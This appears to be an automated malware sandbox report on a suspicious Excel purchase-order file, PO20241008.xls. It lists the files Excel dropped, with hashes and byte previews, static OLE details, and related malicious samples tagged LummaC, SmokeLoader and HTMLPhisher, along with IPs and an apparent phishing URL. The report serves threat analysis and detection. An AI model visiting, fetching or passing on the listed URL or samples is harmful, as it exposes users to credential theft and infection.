              https://beta.adiance.com/wp-content/plugins/arull.php?7088797967704b536932307464507a637a4c7a736c4d7a733752533837503155744a31586533634466584277413d1Get hashmaliciousHTMLPhisherBrowse
              • 188.114.96.3
              Payout Receipt.pptxGet hashmaliciousHTMLPhisherBrowse
              • 188.114.96.3
              a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC, VidarBrowse
              • 13.107.246.60
              file.exeGet hashmaliciousLummaCBrowse
              • 13.107.246.60
              file.exeGet hashmaliciousLummaCBrowse
              • 13.107.246.60
              file.exeGet hashmaliciousLummaCBrowse
              • 13.107.246.60
              file.exeGet hashmaliciousLummaCBrowse
              • 13.107.246.60
              file.exeGet hashmaliciousLummaCBrowse
              • 13.107.246.60
              Oilmax Systems Updated.xlsGet hashmaliciousUnknownBrowse
              • 13.107.246.60
              5zA3mXMdtG.exeGet hashmaliciousSmokeLoaderBrowse
              • 13.107.246.60
              Lk9rbSoFqa.exeGet hashmaliciousSmokeLoaderBrowse
              • 13.107.246.60
              file.exeGet hashmaliciousLummaCBrowse
              • 13.107.246.60

              Dropped Files

              No context

              Created / dropped Files

              C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

              Download File
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
              Category:dropped
              Size (bytes):118
              Entropy (8bit):3.5700810731231707
              Encrypted:false
              SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
              MD5:573220372DA4ED487441611079B623CD
              SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
              SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
              SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

              C:\Users\user\AppData\Local\Microsoft\Office\Features\1-7FeatureCache.txt (copy)

              Download File
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              File Type:data
              Category:dropped
              Size (bytes):934
              Entropy (8bit):2.7129194926077287
              Encrypted:false
              SSDEEP:24:YIrNvpCHhFGMfzLRwcftR/8AJp9WtAZRJ5poIHWPZqy:YmbCHaMfzLmcL8AJtfJ52IH2Zh
              MD5:AEA8676011F651E962233964C56EC078
              SHA1:48A16B5ED64B901BD474918730E8428101BCB382
              SHA-256:F66BFE3FB3CF9C5973527B3C6ED0927D4056DADF962D0B64B87FD97F852191F9
              SHA-512:76ED966584166233A500D2400C012929DC76D1DFF397C3A3D014FB7ECE767730966655974A3B1BE5B6E0C03CC21B3A38B3029916628DCC07D07CC1A8F7031748
              Malicious:false
              Reputation:low
              Preview:3.7.4.6.3.7.6.,.1.1.9.6.3.7.8.,.1.7.8.8.6.5.8.,.2.5.5.0.5.0.8.8.,.1.2.5.,.1.1.9.,.3.0.0.4.9.2.6.8.,.3.7.4.6.2.5.9.,.1.2.2.3.4.3.4.,.3.7.4.6.2.6.5.,.3.7.4.6.2.5.8.,.;.3.2.9.4.5.8.7.9.9.,.3.7.4.6.3.7.8.,.6.3.6.4.3.3.4.,.3.0.1.5.3.7.2.1.,.2.3.7.1.6.5.1.,.6.5.4.0.2.1.5.,.2.4.6.0.9.2.5.8.,.4.0.6.9.3.5.8.2.,.1.0.4.9.5.2.3.4.,.6.3.6.4.3.1.8.,.3.0.1.2.3.4.6.6.,.2.7.1.5.3.4.9.7.,.6.3.7.1.6.9.4.,.8.7.4.7.0.1.5.3.,.5.9.2.2.3.4.2.3.,.5.7.9.9.9.6.6.1.,.1.5.6.1.9.5.8.,.6.3.0.6.3.0.9.9.,.2.7.3.6.0.0.9.5.,.5.8.4.2.5.8.6.0.,.6.3.6.4.3.3.7.,.6.1.7.0.7.3.0.7.,.6.3.6.4.3.3.0.,.6.3.6.4.3.3.1.,.6.7.4.8.3.9.6.1.4.,.3.3.7.9.1.6.2.,.4.7.3.8.2.9.4.8.,.1.6.5.7.4.5.3.,.1.0.6.9.5.5.2.,.1.6.5.7.4.5.2.,.5.2.9.1.0.0.0.0.,.1.3.5.2.5.8.6.,.1.3.5.2.5.8.7.,.1.7.7.1.6.5.7.,.1.0.2.3.8.6.4.,.1.0.2.3.6.3.8.,.6.3.7.1.6.9.5.,.4.8.1.9.5.5.3.8.,.1.4.6.1.9.5.3.,.6.3.6.4.3.3.2.,.3.2.0.5.9.2.7.6.7.,.3.7.4.6.3.7.9.,.1.9.8.4.4.3.5.,.6.1.7.0.7.3.0.5.,.3.1.4.1.5.9.2.0.,.

              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\38302D4E.emf

              Download File
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
              Category:dropped
              Size (bytes):98872
              Entropy (8bit):2.681314822793575
              Encrypted:false
              SSDEEP:768:XOtIvF1D/7ohBb66dZKKBTon4qQbApQKyE:+f5E
              MD5:F37CEAB7E8E934F2580138A386C9D067
              SHA1:9A33CDE7D9EB3D0B2D71C3A400464A2ABB1568DD
              SHA-256:CE4084B51EE8A3152C97FFF64E03956F98BAC50B033932E18F84442AA9B020C7
              SHA-512:A77AFCC359F887E806779BE5B3D13307DA02B4FED7CC2CC59394CC2803EAFBF659E4485CC970B0C54073C0C5D974E70ACF277C8AF3AE534551EE74BA52A19DEB
              Malicious:false
              Reputation:low
              Preview:....l............................}...... EMF....8...g...........................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............!...............)...!..............?...........?................................L...d...E...............E...............!..............?........

              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3AA3D87A.emf

              Download File
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
              Category:dropped
              Size (bytes):97168
              Entropy (8bit):2.644024661766287
              Encrypted:false
              SSDEEP:768:aBRH2Rsq1DE7ohxp6A0+KSBToxEkFapQKJ3p:cJ+f
              MD5:FCA48261B12CA04BADC738EB52D2191A
              SHA1:AB471CEE4F1346A357F18FAF2F2F75FDC0567621
              SHA-256:619F59C860464C43F1485BE264AABB98FACEC1BCE96848FBF8DE542191FC62A9
              SHA-512:E9B20225B0C750A5A669201040D9E02451FE80275E2E9980A3BB4A197295903BC9B9295053E5220A2B70E5D463BF018CB41F3CB46118C5E62481E52BED40A7F3
              Malicious:false
              Reputation:low
              Preview:....l................................... EMF.....{..............................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............!...............)...!..............?...........?................................L...d...E...............E...............!..............?........

              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\46E2D2E2.emf

              Download File
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
              Category:dropped
              Size (bytes):76472
              Entropy (8bit):3.025081600163608
              Encrypted:false
              SSDEEP:384:luYYST5PIYfLe2b52XPl6hAJC00EddMdf0Ii90Z5xxr8sdEdeC:4igYfqg52XPl6hAJC0irRHC
              MD5:A4B79FF3D7725F69AB98C49A72805D64
              SHA1:8617AF425CE74F816B2CE28FF7BF08A7F5317030
              SHA-256:2DE8B86E62DE48780D92E82B3132F559DF0324A000F9BAFC8CAF3D2789D17CE5
              SHA-512:3B7E25DBDFDAD51FFD8DB140091405FABD3242704C0FD0517CEB10C59E5AF57098CA41C3DCA9F9E80045D8A75EE8415927467457E636EA475C0BE95063C94C49
              Malicious:false
              Reputation:low
              Preview:....l..............................eQ.. EMF.....*..y.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........T...)..............."...!..............?...........?................................L...d.......).......G.......)...........!..............?...........?............................

              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\47E99F25.emf

              Download File
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
              Category:dropped
              Size (bytes):8084
              Entropy (8bit):2.570503528684488
              Encrypted:false
              SSDEEP:96:j+RiOO++Z397Q2Acgze0xBdEQzBfCC7Boff8oBJ6ANQ4HJV:jt7ecgKgvzBArH
              MD5:A0D51FBAA34316A0B3E02FA2B5BEA0B8
              SHA1:01B3F570EFCA831762B154AC65E11C122319D35D
              SHA-256:BC55995ADDDFBE0105BDACE8E1603EA7E9DA698C0BDC7E91F043578BF6B28157
              SHA-512:93E08DF7E102CCD3D9077284E1E80369A21BA86B9194B72528BB140ABA83E65E7E2DC59471E2484AE805AF1C13E41C6A5273150E2EFAB06CABFA21BC889405E5
              Malicious:false
              Preview:....l.........../...n............9...... EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o...'.......................%...........................................................L...d...........>...............q.......!..............?...........?................................R...p...................................A.r.i.a.l...............................................

              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\533F568C.emf

              Download File
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
              Category:dropped
              Size (bytes):97168
              Entropy (8bit):2.644024661766287
              Encrypted:false
              SSDEEP:768:aBRH2Rsq1DE7ohxp6A0+KSBToxEkFapQKJ3p:cJ+f
              MD5:FCA48261B12CA04BADC738EB52D2191A
              SHA1:AB471CEE4F1346A357F18FAF2F2F75FDC0567621
              SHA-256:619F59C860464C43F1485BE264AABB98FACEC1BCE96848FBF8DE542191FC62A9
              SHA-512:E9B20225B0C750A5A669201040D9E02451FE80275E2E9980A3BB4A197295903BC9B9295053E5220A2B70E5D463BF018CB41F3CB46118C5E62481E52BED40A7F3
              Malicious:false
              Preview:....l................................... EMF.....{..............................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............!...............)...!..............?...........?................................L...d...E...............E...............!..............?........

              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\791D60F7.emf

              Download File
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
              Category:dropped
              Size (bytes):97168
              Entropy (8bit):2.6906748419763025
              Encrypted:false
              SSDEEP:768:aBtRR1Jl1DW7ohBb66mQKSBTo9fAiFapQKX3p:c//b
              MD5:E1527D440968C6AC201210FB28CB918A
              SHA1:BE377A31AE15A896487A0A89C767F2E0CD72A753
              SHA-256:78721534B2ED4737B1823C8EA152C9DF3DDA1B504F90E34CB32929F64FF94E25
              SHA-512:4D52AA1C47DCA30D8240A20F21399D4C59FA6ACA677D530EB9096E548771FCB9DE046F8BDFCF50E99FE7DCF636421F9AFEABBCCCEB5FF4454DCB8B11C460B8C6
              Malicious:false
              Preview:....l................................... EMF.....{..............................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............!...............)...!..............?...........?................................L...d...E...............E...............!..............?........

              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\919CC17B.emf

              Download File
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
              Category:dropped
              Size (bytes):38272
              Entropy (8bit):2.8200425031385645
              Encrypted:false
              SSDEEP:192:6/UjPGlVrhaHoq7x0ii1lild6rMT54GtXU+j9hMQmlC+a6gz5nCf5OBgJP+SKA:6/1MH61lq4GtXJMQmlC+a6gz5SOyJ1/
              MD5:C898CDC91D0BD5EFB41E576B8A19E931
              SHA1:B9ED5CAC5A526CF8095AB8F8CE36C39F78422407
              SHA-256:044E7012311B28991E687A081E1AC94B7D7EB80F1BE1970F519E949D01A05CA2
              SHA-512:6BCD700AAB23B2205E8294C3071158CA42D4BA6B4B098CA6B511A386FF2E1F8D6B6A3BED4F307475F03161F96425194DEA5581411D3544E95F6D17BCD3264019
              Malicious:false
              Preview:....l...........c................N...@.. EMF........l.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................d......."...........!...............................................d......."...........!...............................................d......."...........!...............................................d......."...........!...............................................d.......'.......................%...........................................................L...d...........c...............d.......!..............?...........?................................R...p.................................. C.a.l.i.b.r.i...........................................

              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\9CFBD6B4.emf

              Download File
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
              Category:dropped
              Size (bytes):2342852
              Entropy (8bit):2.6417290025884554
              Encrypted:false
              SSDEEP:6144:D8elSEv4mD3f5ReZdZJElOFmBwPuqOag8J0tuGOE68J0P:DJlSDmzCJEu5Lg00jh600P
              MD5:B2020C2F370E4625A9EA3C36EEA00DAF
              SHA1:3BCAF1F0CC2E64FDEC9FD0941BA7903A4772F093
              SHA-256:BF45DCFBDBC932E7AE776DA6BDCB2026E3C51924BFC017DB37482C68C8722C32
              SHA-512:78F17558C35106A343B868C35C9429380CA6F606ABCD7644CF866B67CCB157A57F050173B39C1D4B6C86A20039E4AC7F0B12CA564D754C9DC163C877583C7C08
              Malicious:false
              Preview:....l...............2...........@m..?... EMF.....#.'...4...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................

              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\B33A3E20.emf

              Download File
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
              Category:dropped
              Size (bytes):97168
              Entropy (8bit):2.644024661766287
              Encrypted:false
              SSDEEP:768:aBRH2Rsq1DE7ohxp6A0+KSBToxEkFapQKJ3p:cJ+f
              MD5:FCA48261B12CA04BADC738EB52D2191A
              SHA1:AB471CEE4F1346A357F18FAF2F2F75FDC0567621
              SHA-256:619F59C860464C43F1485BE264AABB98FACEC1BCE96848FBF8DE542191FC62A9
              SHA-512:E9B20225B0C750A5A669201040D9E02451FE80275E2E9980A3BB4A197295903BC9B9295053E5220A2B70E5D463BF018CB41F3CB46118C5E62481E52BED40A7F3
              Malicious:false
              Preview:....l................................... EMF.....{..............................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............!...............)...!..............?...........?................................L...d...E...............E...............!..............?........

              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\BF0FD540.emf

              Download File
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
              Category:dropped
              Size (bytes):884312
              Entropy (8bit):1.2944965349348616
              Encrypted:false
              SSDEEP:1536:W3dki8JungPuzcn6F1Tny9Cie/koPs9h9RHJFUrnT15vWP5cPpmJ2dvRaQq3vMog:Hux/ZiOE85e+8J2dvRcvMyw
              MD5:9ABE7EB352E0DB96B52C99AC2FDEA85F
              SHA1:8DC45D02308275BA32B7FFB320A3042256D40C8B
              SHA-256:EC022DFF1CC8251BA9D849C16431914635473FC5457AE73AA277651B47948869
              SHA-512:E43325B927F5365F16118B67E1830B2A0E8CC051D9AEAB144DA6A75751CA39CC1831158270A50ED31BCCBA29C98A56769E516F36C45CB5FAA1BB6ED92CC0A5EB
              Malicious:false
              Preview:....l............................2...... EMF....X~..........................8...X....................?...........................................2......................Q....}..........................................P...(...x...$}...... ....2......(...................$}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\D6055441.emf

              Download File
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
              Category:dropped
              Size (bytes):99352
              Entropy (8bit):2.679591044823692
              Encrypted:false
              SSDEEP:768:hOeIvE1D97ohP46ScVK4BTonxqQbApQKyE:UrQE
              MD5:A1D8A525C9CF4158D96D1047CAD19968
              SHA1:F359A837C8AB9AF86B7E4A180D5694B7F1B851D3
              SHA-256:4F95DCCD6619B83D703850DE8B7B9B69EB595FC248361B5B548C3F42BB9CBE08
              SHA-512:3FB321A34661E187E2A20AD616280263484BBC39CEBD8734BC53BC47DD3C062FF3B2E3DE7DA8CE077555E1DEBEFB7C5A4E8E01E42272CC7C9D22F4DED0A5BE5A
              Malicious:false
              Preview:....l............................}...... EMF....................................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............!...............)...!..............?...........?................................L...d...E...............E...............!..............?........

              C:\Users\user\AppData\Local\Temp\5FD5E7A1.tmp

              Download File
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              File Type:data
              Category:dropped
              Size (bytes):934
              Entropy (8bit):2.7129194926077287
              Encrypted:false
              SSDEEP:24:YIrNvpCHhFGMfzLRwcftR/8AJp9WtAZRJ5poIHWPZqy:YmbCHaMfzLmcL8AJtfJ52IH2Zh
              MD5:AEA8676011F651E962233964C56EC078
              SHA1:48A16B5ED64B901BD474918730E8428101BCB382
              SHA-256:F66BFE3FB3CF9C5973527B3C6ED0927D4056DADF962D0B64B87FD97F852191F9
              SHA-512:76ED966584166233A500D2400C012929DC76D1DFF397C3A3D014FB7ECE767730966655974A3B1BE5B6E0C03CC21B3A38B3029916628DCC07D07CC1A8F7031748
              Malicious:false
              Preview:3.7.4.6.3.7.6.,.1.1.9.6.3.7.8.,.1.7.8.8.6.5.8.,.2.5.5.0.5.0.8.8.,.1.2.5.,.1.1.9.,.3.0.0.4.9.2.6.8.,.3.7.4.6.2.5.9.,.1.2.2.3.4.3.4.,.3.7.4.6.2.6.5.,.3.7.4.6.2.5.8.,.;.3.2.9.4.5.8.7.9.9.,.3.7.4.6.3.7.8.,.6.3.6.4.3.3.4.,.3.0.1.5.3.7.2.1.,.2.3.7.1.6.5.1.,.6.5.4.0.2.1.5.,.2.4.6.0.9.2.5.8.,.4.0.6.9.3.5.8.2.,.1.0.4.9.5.2.3.4.,.6.3.6.4.3.1.8.,.3.0.1.2.3.4.6.6.,.2.7.1.5.3.4.9.7.,.6.3.7.1.6.9.4.,.8.7.4.7.0.1.5.3.,.5.9.2.2.3.4.2.3.,.5.7.9.9.9.6.6.1.,.1.5.6.1.9.5.8.,.6.3.0.6.3.0.9.9.,.2.7.3.6.0.0.9.5.,.5.8.4.2.5.8.6.0.,.6.3.6.4.3.3.7.,.6.1.7.0.7.3.0.7.,.6.3.6.4.3.3.0.,.6.3.6.4.3.3.1.,.6.7.4.8.3.9.6.1.4.,.3.3.7.9.1.6.2.,.4.7.3.8.2.9.4.8.,.1.6.5.7.4.5.3.,.1.0.6.9.5.5.2.,.1.6.5.7.4.5.2.,.5.2.9.1.0.0.0.0.,.1.3.5.2.5.8.6.,.1.3.5.2.5.8.7.,.1.7.7.1.6.5.7.,.1.0.2.3.8.6.4.,.1.0.2.3.6.3.8.,.6.3.7.1.6.9.5.,.4.8.1.9.5.5.3.8.,.1.4.6.1.9.5.3.,.6.3.6.4.3.3.2.,.3.2.0.5.9.2.7.6.7.,.3.7.4.6.3.7.9.,.1.9.8.4.4.3.5.,.6.1.7.0.7.3.0.5.,.3.1.4.1.5.9.2.0.,.

              C:\Users\user\AppData\Local\Temp\~DF0B4C1D8F8464893A.TMP

              Download File
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              File Type:data
              Category:dropped
              Size (bytes):512
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3::
              MD5:BF619EAC0CDF3F68D496EA9344137E8B
              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
              Malicious:false
              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\~DFC5BBB19810E5F837.TMP

              Download File
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              File Type:data
              Category:dropped
              Size (bytes):155648
              Entropy (8bit):6.842290020855385
              Encrypted:false
              SSDEEP:3072:gCk3hbdlylKsgwyzcTbWhZFGkE+cLaxHAUdHzxAKywiZDwKRN7TzfuNLfhnIZAlK:9k3hbdlylKsgwyzcTbWhZFVE+WaxHAIs
              MD5:2634B62E287ED964F7510C73DB10A674
              SHA1:EB1CBC3FDDE6731A96A166C973523ED807945BF3
              SHA-256:499A404B6CEB899B5A10A92F2386AFBF2A34A596F773CB13C7335CC55F15A098
              SHA-512:E9FE50FC2E83823F3EF6C0C81DC9AAE83113DDB237151172400AE322236AE634C39139DD842791C8EAFF1E3DF154A37E76D423A8A7504CF9F556218290C84B89
              Malicious:false
              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\~DFDE784C6FAEAEC666.TMP

              Download File
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              File Type:data
              Category:dropped
              Size (bytes):512
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3::
              MD5:BF619EAC0CDF3F68D496EA9344137E8B
              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
              Malicious:false
              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

              C:\Users\user\Desktop\3EF40000

              Download File
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Oct 8 14:39:06 2024, Security: 1
              Category:dropped
              Size (bytes):681984
              Entropy (8bit):7.028222791044042
              Encrypted:false
              SSDEEP:12288:tARwWYx9wu4hLD3DERnLRmF8DNVrf1x3d2cu69g:ewfx9w/hLbARM8jn399g
              MD5:9B53EB041B3703C184C8CD6EB10CDF28
              SHA1:81A9DF5A5A26C073ABA44190013247D9BD6905B4
              SHA-256:1DB5FD568D58CAD9795E8D91A0BDF150657CDE8CEC9C4147519A4FE41EBB6FDC
              SHA-512:D30A2DAA58F2AA7C85BB9A03D06875CE61E3604A00C2312BBDCF81EEDDD3D3A47A2E151E1E1D89415C42CF25B968184CAC13106D8B2A6601D6FB525DB6AD5C72
              Malicious:false
              Preview:......................>...............................................................................;................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

              C:\Users\user\Desktop\3EF40000:Zone.Identifier

              Download File
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              File Type:ASCII text, with CRLF line terminators
              Category:modified
              Size (bytes):26
              Entropy (8bit):3.95006375643621
              Encrypted:false
              SSDEEP:3:ggPYV:rPYV
              MD5:187F488E27DB4AF347237FE461A079AD
              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
              Malicious:false
              Preview:[ZoneTransfer]....ZoneId=0

              C:\Users\user\Desktop\PO20241008.xls (copy)

              Download File
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Oct 8 14:39:06 2024, Security: 1
              Category:dropped
              Size (bytes):681984
              Entropy (8bit):7.028222791044042
              Encrypted:false
              SSDEEP:12288:tARwWYx9wu4hLD3DERnLRmF8DNVrf1x3d2cu69g:ewfx9w/hLbARM8jn399g
              MD5:9B53EB041B3703C184C8CD6EB10CDF28
              SHA1:81A9DF5A5A26C073ABA44190013247D9BD6905B4
              SHA-256:1DB5FD568D58CAD9795E8D91A0BDF150657CDE8CEC9C4147519A4FE41EBB6FDC
              SHA-512:D30A2DAA58F2AA7C85BB9A03D06875CE61E3604A00C2312BBDCF81EEDDD3D3A47A2E151E1E1D89415C42CF25B968184CAC13106D8B2A6601D6FB525DB6AD5C72
              Malicious:true
              Preview:......................>...............................................................................;................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

              Static File Info

              General

              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Oct 8 06:29:01 2024, Security: 1
              Entropy (8bit):7.2638458188396084
              TrID:
              • Microsoft Excel sheet (30009/1) 47.99%
              • Microsoft Excel sheet (alternate) (24509/1) 39.20%
              • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
              File name:PO20241008.xls
              File size:1'094'656 bytes
              MD5:2f967a802f4b792f40315232d8232cd7
              SHA1:6d61ccac86a924e895114e0e9b06ee2185075497
              SHA256:5ccf5c84f7c2890c2769eefb521253092d9b5fd73534ebbb8e02acc6858b3684
              SHA512:7f5cad5a50f8a7cb823ca7b2fd9047085340952c10822701d7e1eea86c1cb5b17ee8ce176058741b7c47e18042cfae57a189443b14aaceafd1eaf94c36d4697c
              SSDEEP:12288:fmzHJEHAfwu4hCD3DERnLRmF8D3Prf1O3dyFub2Xda7yBinTi0eh6Ro4WcJDS7l8:WLw/hCbARM8/c3j2XE7yxP8oEJDShI
              TLSH:8135CF83EA5D4F62CD81423466F71B7A13249C43D622432F22F1772839FBAD06956FAD
              File Content Preview:........................>...............................................................................<.......................i.......k......................................................................................................................

              File Icon

              Icon Hash:35ed8e920e8c81b5

              Static OLE Info

